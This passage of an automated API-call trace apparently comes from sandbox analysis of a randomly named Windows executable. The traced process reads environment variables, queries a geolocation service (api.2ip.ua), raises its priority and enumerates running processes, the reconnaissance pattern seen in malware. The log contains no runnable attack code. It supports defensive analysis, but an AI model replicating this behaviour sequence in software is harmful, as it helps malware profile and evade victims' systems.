CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x4a17340, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0068.612] GetLastError () returned 0x0 [0068.612] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x4c [0068.612] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x50) returned 0x4a21ae8 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.612] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x12) returned 0x4a211d8 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x4a211d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0068.612] GetLastError () returned 0x0 [0068.612] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x50 [0068.612] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x54) returned 0x4a21ae8 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.612] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x18) returned 0x4a211f8 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x4a211f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0068.612] GetLastError () returned 0x0 [0068.612] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x54 [0068.612] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x58) returned 0x4a21ae8 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0068.612] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1b) returned 0x4a21328 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x4a21328, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0068.612] GetLastError () returned 0x0 [0068.612] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x58 [0068.612] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x5c) returned 0x4a21ae8 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0068.612] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x24) returned 0x4a1a998 [0068.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x4a1a998, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0068.612] GetLastError () returned 0x0 [0068.613] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x5c [0068.613] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x60) returned 0x4a21ae8 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0068.613] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x29) returned 0x4a1b0e0 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x4a1b0e0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0068.613] GetLastError () returned 0x0 [0068.613] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x60 [0068.613] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x64) returned 0x4a21ae8 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0068.613] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1e) returned 0x4a21350 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x4a21350, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0068.613] GetLastError () returned 0x0 [0068.613] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x64 [0068.613] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x68) returned 0x4a21ae8 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0068.613] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x41) returned 0x4a17390 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x4a17390, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0068.613] GetLastError () returned 0x0 [0068.613] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x68 [0068.613] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x6c) returned 0x4a21ae8 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0068.613] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x17) returned 0x4a21298 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x4a21298, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0068.613] GetLastError () returned 0x0 [0068.613] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x6c [0068.613] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x70) returned 0x4a21ae8 [0068.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.614] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0xf) returned 0x4a1df88 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x4a1df88, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0068.614] GetLastError () returned 0x0 [0068.614] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x70 [0068.614] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x74) returned 0x4a21ae8 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0068.614] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x16) returned 0x4a212b8 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x4a212b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0068.614] GetLastError () returned 0x0 [0068.614] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x74 [0068.614] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x78) returned 0x4a21ae8 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0068.614] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2a) returned 0x4a1b118 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x4a1b118, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0068.614] GetLastError () returned 0x0 [0068.614] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x78 [0068.614] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x7c) returned 0x4a21ae8 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0068.614] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x29) returned 0x4a1b150 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x4a1b150, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0068.614] GetLastError () returned 0x0 [0068.614] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x7c [0068.614] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x80) returned 0x4a21ae8 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0068.614] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x15) returned 0x4a21b70 [0068.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x4a21b70, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0068.615] GetLastError () returned 0x0 [0068.615] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21ae8) returned 0x80 [0068.615] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21ae8, Size=0x84) returned 0x4a21b90 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0068.615] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1e) returned 0x4a21378 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x4a21378, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0068.615] GetLastError () returned 0x0 [0068.615] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21b90) returned 0x84 [0068.615] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21b90, Size=0x88) returned 0x4a21b90 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0068.615] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2a) returned 0x4a1b188 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x4a1b188, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0068.615] GetLastError () returned 0x0 [0068.615] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21b90) returned 0x88 [0068.615] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21b90, Size=0x8c) returned 0x4a21b90 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.615] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x12) returned 0x4a21ae8 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x4a21ae8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0068.615] GetLastError () returned 0x0 [0068.615] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21b90) returned 0x8c [0068.615] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21b90, Size=0x90) returned 0x4a21b90 [0068.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.616] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x18) returned 0x4a21b08 [0068.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x4a21b08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0068.616] GetLastError () returned 0x0 [0068.616] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21b90) returned 0x90 [0068.616] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21b90, Size=0x94) returned 0x4a21b90 [0068.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0068.616] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x46) returned 0x4a173e0 [0068.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x4a173e0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0068.616] GetLastError () returned 0x0 [0068.616] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21b90) returned 0x94 [0068.616] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21b90, Size=0x98) returned 0x4a21b90 [0068.616] GetLastError () returned 0x0 [0068.616] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.617] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.617] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.617] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x8ec) returned 0x4a21c30 [0068.618] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.618] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x10) returned 0x4a1dfa0 [0068.618] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.618] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.618] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.619] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.622] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0071.482] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x40) returned 0x4a150c0 [0071.482] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0106.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aff0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7f0 | out: lpBuffer=0x18aff0*, lpdwNumberOfBytesRead=0x18d7f0*=0x2ba) returned 1 [0106.517] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0106.520] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0106.520] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x20) returned 0x4a2c280 [0106.520] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x2d0) returned 0x75dce18 [0106.520] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75dce18 | out: hHeap=0x4a00000) returned 1 [0106.520] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a2c280 | out: hHeap=0x4a00000) returned 1 [0106.520] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a150c0 | out: hHeap=0x4a00000) returned 1 [0106.521] GetCurrentProcess () returned 0xffffffff [0106.521] GetLastError () returned 0x2 [0106.521] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0106.521] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x10) returned 0x4a48598 [0106.521] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x8ec) returned 0x75ddcf8 [0106.521] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x800) returned 0x75de5f0 [0106.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x75de5f0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe")) returned 0x3a [0106.521] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0106.521] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x810) returned 0x75dedf8 [0106.521] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" " [0106.521] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" ", pNumArgs=0x18d8d0 | out: pNumArgs=0x18d8d0) returned 0x4a4bd90*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0106.522] lstrcpyW (in: lpString1=0x18e560, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0106.522] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" " [0106.522] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" ", pNumArgs=0x18d86c | out: pNumArgs=0x18d86c) returned 0x4a4bd90*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0106.522] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned="OqRoSnESYXcDITEx.exe" [0106.522] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0106.523] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0106.523] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0106.524] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0106.524] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0106.528] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0106.528] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0106.528] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0106.528] EnumProcesses (in: lpidProcess=0x183068, cb=0xa000, lpcbNeeded=0x18d878 | out: lpidProcess=0x183068, lpcbNeeded=0x18d878) returned 1 [0106.533] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0106.533] CloseHandle (hObject=0x0) returned 0 [0106.533] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 [0106.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0106.534] CloseHandle (hObject=0x0) returned 0 